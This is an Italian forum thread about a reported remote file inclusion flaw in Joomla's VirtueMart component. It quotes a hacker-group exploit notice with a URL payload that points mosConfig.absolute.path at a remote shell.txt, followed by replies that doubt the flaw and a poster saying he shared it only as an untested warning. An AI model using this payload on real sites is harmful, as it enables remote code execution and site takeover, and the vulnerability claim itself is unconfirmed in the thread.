Joomla Component com_virtuemart Remote File Inclusion

[jeckodevelopment]

Al momento non esiste una versione che fissi la problematica di sicurezza.

Di seguito il riferimento all'exploit

Codice: [Seleziona]

+===================================================================================+
[?]Joomla Component com_virtuemart Remote File Inclusion
+===================================================================================+
    [?] My h0m3:              [http://HaCkTeCh.Org/cc            ]
    [?] F0r 4sk:              [F5w@hotmail.com                   ]
    [?] 5cr1p7:               [     joomla                       ]
    [?] h0m3 5cr1p7           [ http://www.joomla.com           ]
    [?] L4nguage:             [ PHP                              ]
    [?] F0und3r:              [ Li0n-PaL                         ]
   
 
===[ Expl0it  ]===
http://localhost/ /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=
[http://localhost/shell.txt???]


[mau_develop]

non ho tempo da dedicargli ma mi sembra strana quella vulnerabilità...

virtue mart cosa ne pensa?

è facile che siano i soliti bimbi che fan tutto senza sapere nulla, magari in quel sito funziona.

Hai provato su altri? se la vuln è quella basta incollare la stringa, magari mettigli un pippo.txt e un google come dominio, senza andare a pescare in quel dominio.

M.

[jeckodevelopment]

non ho fatto dei test sulla vulnerabilità sinceramente... l'ho postata per mettere in guardia gli utenti che utilizzano il componente.